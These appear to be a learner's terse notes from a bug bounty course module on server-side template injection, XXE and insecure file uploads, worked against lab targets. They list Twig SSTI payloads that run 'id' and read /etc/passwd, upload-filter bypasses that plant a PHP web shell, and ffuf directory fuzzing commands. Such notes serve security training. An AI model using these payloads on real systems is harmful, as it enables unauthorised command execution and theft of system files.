Practical Bug Bounty — TCM Academy | Module 8 pt.3 (SSTI, XXE, Insecure File Uploads)

Template injection is used to separate presentation layer from logic layer.

Exploiting Server-Side Template Injection (SSTI)

As we know that the template application using is TWIG php, lets go and check for payloads on hacktricks.

Attacks:

{{7*7}}{{[‘id’]|filter(‘system’)}}{{[‘cat\x20/etc/passwd’]|filter(‘system’)}}

Server-Side Template Injection (SSTI) Challenge Walkthrough

Start with testing preivous payloads.

Attacks:

{{7*7}}{{[‘id’]|filter(‘system’)}}

XML External Entity (XXE) Injection

Some application uses XML to transfer data.

Attacks:

edit the <creds></creds> tags.get the exploit from payloadallthethings.

You can test many things with file uploads. In some cases we can overwrite files or might DDOS the system.

Insecure File Upload Client-Side Controls Bypass

First analyze the web application.

Attacks:

Change the extension in request and bypass.Remove bytes and add php shell.ffuf -u URL/FUZZ -w /usr/share/wordlists/commonffuf -u URL/labs/FUZZ -w /usr/share/wordlists/commonURL/labs/uploads/cmd.php?cmd=whoami

Insecure File Upload Bypasses

Attacks:

try logo.php%0.pngtry logo.php.pngadd the payload after magic bytesIf application is blocking .php you can use other php extensions.

Insecure File Uploads Challenge Walkthrough

Attacks:

Try different extensions.localhost/labs/uploads/fi;e.phtml?cmd=whoami